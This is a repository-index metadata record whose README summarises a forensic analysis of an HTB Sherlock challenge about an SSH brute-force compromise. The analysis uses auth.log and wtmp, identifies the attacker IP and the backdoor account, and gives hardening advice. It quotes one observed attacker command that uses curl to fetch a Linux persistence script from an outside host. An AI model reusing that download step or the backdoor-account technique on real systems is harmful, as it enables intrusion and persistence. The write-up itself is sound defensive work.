{"id":31208011,"url":"https://github.com/lenardjombo/brutus","last_synced_at":"2025-09-20T22:51:37.959Z","repository":{"id":315274433,"uuid":"1058795910","full_name":"lenardjombo/Brutus","owner":"lenardjombo","description":"Exploring a scenario where a Confluence server was brute-forced via its SSH service","archived":false,"fork":false,"pushed_at":"2025-09-17T16:02:01.000Z","size":11,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-17T18:43:23.267Z","etag":null,"topics":["brutus","cybersecurity","dfir"],"latest_commit_sha":null,"homepage":"https://labs.hackthebox.com/achievement/sherlock/2622871/631","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lenardjombo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-17T14:59:53.000Z","updated_at":"2025-09-17T16:02:04.000Z","dependencies_parsed_at":"2025-09-17T18:43:24.892Z","dependency_job_id":"61d95749-ba81-4519-931b-c1b942548f01","html_url":"https://github.com/lenardjombo/Brutus","commit_stats":null,"previous_names":["lenardjombo/brutus"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/lenardjombo/Brutus","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lenardjombo","download_url":"https://codeload.github.com/lenardjombo/Brutus/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":276169661,"owners_count":25596956,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-20T02:00:10.207Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brutus","cybersecurity","dfir"],"created_at":"2025-09-20T22:51:36.716Z","updated_at":"2025-09-20T22:51:37.954Z","avatar_url":"https://github.com/lenardjombo.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"Sherlock — SSH / auth.log \u0026 wtmp Analysis\nOverview\n\nThis project analyzes the auth.log and wtmp artifacts from the HTB sherlock challenge to investigate an SSH brute-force compromise against a Confluence server. The investigation included:\n\nIdentifying the brute-force source IP and confirming successful authentication.\n\nCorrelating auth.log events with wtmp records (using utmp.py) to determine when an interactive terminal session was established and its session number.\n\nTracing post-exploitation activity: creation of a backdoor user and evidence of privileged commands used to download an external script.\n\nProducing a clear timeline, sanitized evidence, and recommendations for remediation.\n\nKey findings (short)\n\nAttacker IP: 65.2.161.68\n\nCompromised user: root\n\nInteractive login (UTC): 2024-03-06 06:32:45\n\nSession number: 37\n\nBackdoor account: cyberjunkie (MITRE: T1136.001)\n\nObserved privileged download: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh\n\nImportance to cybersecurity\n\nLogs such as auth.log and wtmp are critical sources for incident detection and forensic reconstruction. By correlating authentication events with session records and command evidence, defenders can:\n\nDetermine how attackers gained initial access and what actions followed the compromise.\n\nIdentify persistence mechanisms (e.g., new accounts) and remove them before further damage.\n\nRecommend concrete hardening steps (disable root SSH, enforce key-based authentication, enable rate-limiting and 2FA) to reduce future risk.\n\nThis exercise demonstrates practical skills in log analysis, timeline building, and evidence sanitization — all core capabilities for defenders, incident responders, and forensic analysts.\n\nUsage\n\nThe repository includes sanitized logs, utmp.py and writeup.md. These can be used to reproduce the analysis:\n\nParse wtmp with last -f wtmp or python utmp.py wtmp.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flenardjombo%2Fbrutus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flenardjombo%2Fbrutus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flenardjombo%2Fbrutus/lists"}